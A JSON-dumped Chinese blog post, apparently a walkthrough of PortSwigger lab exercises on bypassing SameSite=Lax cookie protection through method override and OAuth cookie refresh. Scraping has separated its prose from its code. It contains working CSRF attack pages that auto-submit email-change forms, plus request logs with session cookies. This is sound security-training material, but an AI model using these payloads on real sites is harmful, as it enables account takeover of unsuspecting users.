<\/p>\n\n\n\n
<\/p>\n\n\n\n <\/p>\n\n\n\n <\/p>\n\n\n\n \u76ee\u6a19 \u539f\u672cEMAIL\u7684\u8acb\u6c42\u4f7f\u7528POST\u5982\u4e0b\uff0c\u4f46\u56e0\u70baSameSite\uff1dLax\u6240\u4ee5\u7121\u6cd5\u5e36\u53d7\u5bb3\u8005cookie\uff0c\u4f7fCSRF\u653b\u64ca\u7121\u6548<\/p>\n\n\n\n \u4f46\u5982\u679c\u6539\u70baGET\u8acb\u6c42\uff0c \u56e0\u6b64\u5c07\u8acb\u6c42\u6539\u6210GET\u5982\u4e0b\uff0c\u4f46\u767c\u73fe\u76ee\u6a19\u670d\u52d9\u5668\u4e0d\u5141\u8a31<\/p>\n\n\n\n \u4f46\u76ee\u6a19\u670d\u52d9\u6709\u652f\u6301 <\/p>\n\n\n\n \u6e96\u5099\u4ee5\u4e0b\u653b\u64ca\u9801\u9762\u8b93\u8a2a\u5ba2\u81ea\u5df1\u4fee\u6539EMAIL<\/p>\n\n\n\n \u7576\u4f7f\u7528\u8005\u8a2a\u554f\u4ee5\u4e0a\u653b\u64ca\u9801\u9762\uff0c\u5c31\u6703\u7522\u751f\u4ee5\u4e0b\u8acb\u6c42\uff0c\u5c07EMAIL\u4fee\u6539\u70ba Lab: SameSite Lax bypass via method override<\/p>\n\n\n\n <\/p>\n\n\n\n <\/p>\n\n\n\n <\/p>\n\n\n\n \u5982\u679c\u7db2\u7ad9 \u8a72\u76ee\u6a19\u7528POST\u767c\u9001change-email\u8acb\u6c42\u66f4\u6539email\uff0c\u56e0\u6b64\u53ef\u900f\u904eCSRF\u6539\u5c0d\u65b9email\uff0c\u65b9\u6cd5\u5982\u4e0b<\/p>\n\n\n\n \u6e96\u5099\u653b\u64ca\u9801\u5982\u4e0b<\/p>\n\n\n\n \u53d7\u5bb3\u8005\u5982\u679c\u767b\u5165\u5f8c\u5c0f\u65bc2\u5206\u9418\u8a2a\u554f\u653b\u64ca\u7db2\u9801\uff0c\u5247\u767c\u51fa\u7684change-email\u8acb\u6c42\u6703\u5e36cookie\u5982\u4e0b\uff0c\u800c\u4e14email\u6210\u529f\u4fee\u6539<\/p>\n\n\n\n <\/p>\n\n\n\n \u4f46\u662f\u5982\u679c\u662f\u5728\u767b\u51652\u5206\u9418\u5f8c\u624d\u8a2a\u554f\u653b\u64ca\u7db2\u9801\uff0c\u5247change-email\u8acb\u6c42\u4e0d\u6703\u5e36 <\/p>\n\n\n\n \u70ba\u4e86\u89e3\u6c7a\u767b\u51652\u5206\u9418\u5f8c\u653b\u64ca\u7121\u6cd5\u653b\u64ca\u6210\u529f\u554f\u984c\uff0c\u5c07\u653b\u64ca\u6d41\u7a0b\u505a\u8abf\u6574<\/p>\n\n\n\n \u65b0\u7684\u8a9e\u6cd5\u6703\u5f37\u5236\u8a2a\u554fsocial-login\uff0c\u8b93cookie\u5237\u65b0\u8b8a\u6210\u525b\u767b\u5165\u7684\u6a23\u5b50\uff0c\u9019\u6a23\u5c31\u80fd\u7522\u751f\u5c0f\u65bc2\u5206\u9418\u767b\u5165\u7684\u60c5\u5883\uff0c\u56e0\u6b64\u66f4\u6539\u653b\u64ca\u9801\u9762\u5982\u4e0b<\/p>\n\n\n\n \u5be6\u6e2c2\u5206\u9418\u5f8c\u8a2a\u554f\u653b\u64ca\u7db2\u9801\uff0c\u767c\u73fe\u8acb\u6c42\u88ab\u700f\u89bd\u5668\u7684\u5f48\u51fa\u7a97\u53e3\u963b\u6b62\uff0c\u4f46\u904e\u4e00\u9663\u5b50\u5f8c\uff0cCSRF\u7e7c\u7e8c\u57f7\u884c\uff0c\u4f46\u9001\u51fa\u7684change-email\u8acb\u6c42\u4e0d\u6703\u5e36 \u5f48\u51fa\u8996\u7a97\u9650\u5236\u662f\u56e0\u70ba\u5c1a\u672a\u624b\u52d5\u8207\u8a72\u9801\u9762\u4e92\u52d5\uff0c\u6240\u4ee5\u8abf\u6574\u8a72\u653b\u64ca\u8a9e\u6cd5\uff0c\u8a98\u5c0e\u53d7\u5bb3\u8005\u55ae\u64ca\u9801\u9762\uff0c\u4e26\u4e14\u50c5\u5728\u7528\u6236\u55ae\u64ca\u5f8c\u624d\u6253\u958b\u5f48\u51fa\u8996\u7a97\uff0c\u56e0\u6b64\u66f4\u6539\u653b\u64ca\u9801\u9762\u5982\u4e0b<\/p>\n\n\n\n \u5be6\u6e2c2\u5206\u9418\u5f8c\u8a2a\u554f\u653b\u64ca\u7db2\u9801\uff0c\u6703\u51fa\u73fe\u63d0\u793a\u4fe1\u606f\u9ede\u64ca\u8a72\u7db2\u9801\uff0c\u63a5\u8457\u89f8\u767cOAuth\u6d41\u7a0b\u767c\u9001\u7684\u65b0\u7684 \u63a5\u8457\u767c\u9001\u5e36\u6709 Lab: SameSite Lax bypass via cookie refresh<\/p>\n","protected":false},"excerpt":{"rendered":" SameSite\uff1dLax \u8868\u793a\u700f\u89bd\u5668\u53ea\u5728\u4ee5\u4e0b2\u7a2e\u60c5\u6cc1\u624d\u6703\u5728\u8de8 …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[40],"tags":[42],"class_list":["post-1284","post","type-post","status-publish","format-standard","hentry","category-clientside","tag-bypass"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1284","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1284"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1284\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1284"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1284"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1284"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}SameSite\uff1dLax<\/code> \u8868\u793a\u700f\u89bd\u5668\u53ea\u5728\u4ee5\u4e0b2\u7a2e\u60c5\u6cc1\u624d\u6703\u5728\u8de8\u7db2\u7ad9\u8acb\u6c42\u4e2d\u50b3\u9001 cookie <\/code>\uff0c\u800c\u4e14\u5927\u90e8\u4efd\u700f\u89bd\u5668\u9ed8\u8a8d\u6b64\u8a2d\u5b9a\u3002<\/p>\n\n\n\n\n
GET<\/code>\u65b9\u6cd5\u3002<\/li>\n\n\n\n
\n\n\n\n\u5229\u7528\u8acb\u6c42\u65b9\u6cd5\u9952\u904e<\/h2>\n\n\n\n
cookie<\/code>\u70baSameSite Lax<\/code>\uff0c\u653b\u64ca\u8005\u60f3\u7528CSRF\u6539\u5c0d\u65b9email<\/p>\n\n\n\n############## request ############## \nPOST \/my-account\/change-email HTTP\/1.1\nHost: 0a3400d2043c89a2872ccbed006100e0.web-security-academy.net\nCookie: session=f9FHp5tKDaoMKgHWY6ouxPPDV3DVrXFA\n...omit...\nemail=wiener3%40normal-user.net\n\n############## response ############## \nHTTP\/1.1 302 Found\nLocation: \/my-account\nConnection: close\nContent-Length: 0<\/code><\/pre>\n\n\n\nSameSite\uff1dLax<\/code>\u53ef\u5e36\u53d7\u5bb3\u8005cookie<\/code>\uff0c\u4f7fCSRF\u653b\u64ca\u6709\u6548<\/p>\n\n\n\n############## request ############## \nGET \/my-account\/change-email?email=wiener3%40normal-user.net HTTP\/1.1\nHost: 0a3400d2043c89a2872ccbed006100e0.web-security-academy.net\nCookie: session=f9FHp5tKDaoMKgHWY6ouxPPDV3DVrXFA\n...omit...\n\n\n############## response ############## \nHTTP\/1.1 405 Method Not Allowed\nAllow: POST\nContent-Type: application\/json; charset=utf-8\nConnection: close\nContent-Length: 20\n\t\n\"Method Not Allowed\"<\/code><\/pre>\n\n\n\n_method<\/code>\u65b9\u6cd5\uff0c\u7528\u6b64\u65b9\u6cd5\u767c\u9001GET\u8acb\u6c42\u670d\u52d9\u5668\u53ef\u63a5\u53d7<\/p>\n\n\n\n############## request ############## \nGET \/my-account\/change-email?email=wiener3%40normal-user.net&_method=POST<\/mark> HTTP\/1.1\nHost: 0a3400d2043c89a2872ccbed006100e0.web-security-academy.net\nCookie: session=f9FHp5tKDaoMKgHWY6ouxPPDV3DVrXFA\n...omit...\n\n\n############## response ############## \nHTTP\/1.1 302 Found\nLocation: \/my-account\nConnection: close\nContent-Length: 0<\/code><\/pre>\n\n\n\n<script>\n document.location = \"https:\/\/0a3400d2043c89a2872ccbed006100e0.web-security-academy.net\/my-account\/change-email?email=pwned@web-security-academy.net&_method=POST\";\n<\/script><\/code><\/pre>\n\n\n\npwned@web-security-academy.net<\/code><\/p>\n\n\n\n############## request ############## \nGET \/my-account\/change-email?email=pwned@web-security-academy.net&_method=POST HTTP\/2\nHost: 0a3400d2043c89a2872ccbed006100e0.web-security-academy.net\nCookie: session=f9FHp5tKDaoMKgHWY6ouxPPDV3DVrXFA\n...omit...\n\n############## response ############## \nHTTP\/2 302 Found\nLocation: \/my-account?id=wiener\nX-Frame-Options: SAMEORIGIN\nContent-Length: 0<\/code><\/pre>\n\n\n\n
\n\n\n\n\u5229\u7528\u5237\u65b0cookie\u9952\u904e<\/h2>\n\n\n\n
SameSite<\/code>\u5728\u8a2d\u5b9a Cookie <\/code>\u6642\u4e0d\u5305\u542b\u5c6c\u6027\uff0cChrome \u9810\u8a2d\u6703\u81ea\u52d5\u5957\u7528Lax<\/code>\u9650\u5236\u3002\u4f46\u662f\uff0c\u70ba\u4e86\u907f\u514d\u7834\u58deSSO\uff08\u55ae\u4e00\u767b\u5165\u6a5f\u5236\uff09\uff0c\u5b83\u5be6\u969b\u4e0a\u4e0d\u6703\u5728\u524d 120 \u79d2\u5167\u5c0dPOST<\/code>\u8acb\u6c42\u5f37\u5236\u57f7\u884c\u9019\u4e9b\u9650\u5236\uff0c\u56e0\u6b64\u9019\u63d0\u4f9b\u4e86\u4e00\u4e9b\u653b\u64ca\u7684\u6a5f\u6703\uff0c\u8209\u4f8b\u5982\u4e0b\u3002<\/p>\n\n\n\n\u5efa\u7acbCSRF\u653b\u64ca\u9801\u9762<\/h3>\n\n\n\n
<script>\n history.pushState('', '', '\/')\n<\/script>\n<form action=\"https:\/\/0a21000d03af9f60c8758a0d00d3000d.web-security-academy.net\/my-account\/change-email\" method=\"POST\">\n <input type=\"hidden\" name=\"email\" value=\"foo@bar.com\" \/>\n <input type=\"submit\" value=\"Submit request\" \/>\n<\/form>\n<script>\n document.forms[0].submit();\n<\/script><\/code><\/pre>\n\n\n\n############### request ############### \nPOST \/my-account\/change-email HTTP\/1.1\nHost: 0a21000d03af9f60c8758a0d00d3000d.web-security-academy.net\nCookie: session=5UYyNW79TLrNT3B4HL4HwQPQAyJcHV1p<\/mark>\n...omit...\nemail=foo%40bar.com\n\n############### response ############### \nlocation:\/my-account?id=wiener<\/code><\/pre>\n\n\n\ncookie<\/code>\uff0c\u800c\u4e14\u6703\u88ab\u91cd\u5c0e\u5230social-login\u900f\u904eOAuth\u6d41\u7a0b\u767b\u5165\uff0cemail\u4e5f\u4e0d\u6703\u6210\u529f\u4fee\u6539<\/p>\n\n\n\n############### request ############### \nPOST \/my-account\/change-email HTTP\/1.1\nHost: 0a2d008f0455d839c219d68f00230035.web-security-academy.net\n...omit...\nemail=foo%40bar.com\n\n############### response ############### \nHTTP\/1.1 302 Found\nLocation: \/social-login\nSet-Cookie: session=YEYy6T1SoOpt79pc3D2zruZRP11OdNPh; Expires=Tue, 31 Jan 2023 06:06:19 UTC; Secure; HttpOnly<\/code><\/pre>\n\n\n\n\u514b\u670d2\u5206\u9418\u9650\u5236<\/h3>\n\n\n\n
<form method=\"POST\" action=\"https:\/\/0a21000d03af9f60c8758a0d00d3000d.web-security-academy.net\/my-account\/change-email\">\n <input type=\"hidden\" name=\"email\" value=\"pwned2@web-security-academy.net\">\n<\/form>\n<script>\n window.open('https:\/\/0a21000d03af9f60c8758a0d00d3000d.web-security-academy.net\/social-login');\n setTimeout(changeEmail, 5000);\n\n function changeEmail(){\n document.forms[0].submit();\n }\n<\/script><\/code><\/pre>\n\n\n\ncookie<\/code>\uff0c\u800c\u4e14\u6703\u88ab\u91cd\u5c0e\u5230social-login\uff0cemail\u4e5f\u4e0d\u6703\u6210\u529f\u4fee\u6539<\/p>\n\n\n\n############### request ############### \nPOST \/my-account\/change-email HTTP\/2\nHost: 0a21000d03af9f60c8758a0d00d3000d.web-security-academy.net\n...omit...\nemail=pwned%40web-security-academy.net\n\n############### response ############### \nHTTP\/2 302 Found\nLocation: \/social-login\nSet-Cookie: session=yYMU9cFxTfE59g8wsCqXv1YPxCj1N0vZ; Expires=Sat, 24 Feb 2024 03:27:51 UTC; Secure; HttpOnly\nX-Frame-Options: SAMEORIGIN\nContent-Length: 0<\/code><\/pre>\n\n\n\n\u514b\u670d\u5f48\u7a97\u9650\u5236<\/h3>\n\n\n\n
<form method=\"POST\" action=\"https:\/\/YOUR-LAB-ID.web-security-academy.net\/my-account\/change-email\">\n <input type=\"hidden\" name=\"email\" value=\"pwned@portswigger.net\">\n<\/form>\n<p>Click anywhere on the page<\/p>\n<script>\n window.onclick = () => {\n window.open('https:\/\/YOUR-LAB-ID.web-security-academy.net\/social-login');\n setTimeout(changeEmail, 10000);\n }\n\n function changeEmail() {\n document.forms[0].submit();\n }\n<\/script><\/code><\/pre>\n\n\n\ncookie<\/code><\/p>\n\n\n\n\nGET \/social-login HTTP\/1.1\nHost: 0a21000d03af9f60c8758a0d00d3000d.web-security-academy.net\nCookie: session=IQlZqVbqoEtJIOQ0Tfh10ZOn5eVqDOMN\n...omit...<\/code><\/pre>\n\n\n\n############### request ############### \nGET \/auth?client_id=jhlo4bf3lvvd3c6owf9wo&redirect_uri=https:\/\/0a2d008f0455d839c219d68f00230035.web-security-academy.net\/oauth-callback&response_type=code&scope=openid%20profile%20email HTTP\/1.1\nHost: oauth-0ae900e704a4d8edc22ad4bc02470026.web-security-academy.net\nCookie: _session=yTvnUxefeHYN-i7GLGQ2Y; _session.legacy=yTvnUxefeHYN-i7GLGQ2Y\n...omit...\n\n############### response ############### \nHTTP\/1.1 302 Found\nX-Powered-By: Express\nPragma: no-cache\nCache-Control: no-cache, no-store\nLocation: https:\/\/0a2d008f0455d839c219d68f00230035.web-security-academy.net\/oauth-callback?code=v1xtBTdlX7tZYDgrSpsLHRtU4_Zuzf_qhZ21lrlStvV\nContent-Type: text\/html; charset=utf-8\nSet-Cookie: _session=yTvnUxefeHYN-i7GLGQ2Y; path=\/; expires=Mon, 13 Feb 2023 05:52:56 GMT; samesite=none; secure; httponly\nSet-Cookie: _session.legacy=yTvnUxefeHYN-i7GLGQ2Y; path=\/; expires=Mon, 13 Feb 2023 05:52:56 GMT; secure; httponly\n...omit...<\/code><\/pre>\n\n\n\n############### request ############### \nGET \/oauth-callback?code=v1xtBTdlX7tZYDgrSpsLHRtU4_Zuzf_qhZ21lrlStvV HTTP\/1.1\nHost: 0a21000d03af9f60c8758a0d00d3000d.web-security-academy.net\nCookie: session=IQlZqVbqoEtJIOQ0Tfh10ZOn5eVqDOMN\n...omit...\n\n############### response ############### \nHTTP\/1.1 200 OK\nContent-Type: text\/html; charset=utf-8\nSet-Cookie: session=gRyBLMDDDPEo2nEVN0pGMM2DIbX08nWs<\/mark>; Expires=Tue, 31 Jan 2023 05:53:00 UTC; Secure; HttpOnly\n...omit...<\/code><\/pre>\n\n\n\ncookie<\/code>\u7684change-email\u8acb\u6c42\uff0c\u78ba\u8a8demail\u6210\u529f\u4fee\u6539<\/p>\n\n\n\n############### request ############### \nPOST \/my-account\/change-email HTTP\/1.1\nHost: 0a21000d03af9f60c8758a0d00d3000d.web-security-academy.net\nCookie: session=gRyBLMDDDPEo2nEVN0pGMM2DIbX08nWs\n<\/mark>\n...omit...\nemail=pwned%40portswigger.net\n\n############### response ############### \nlocation:\/my-account?id=wiener<\/code><\/pre>\n\n\n\n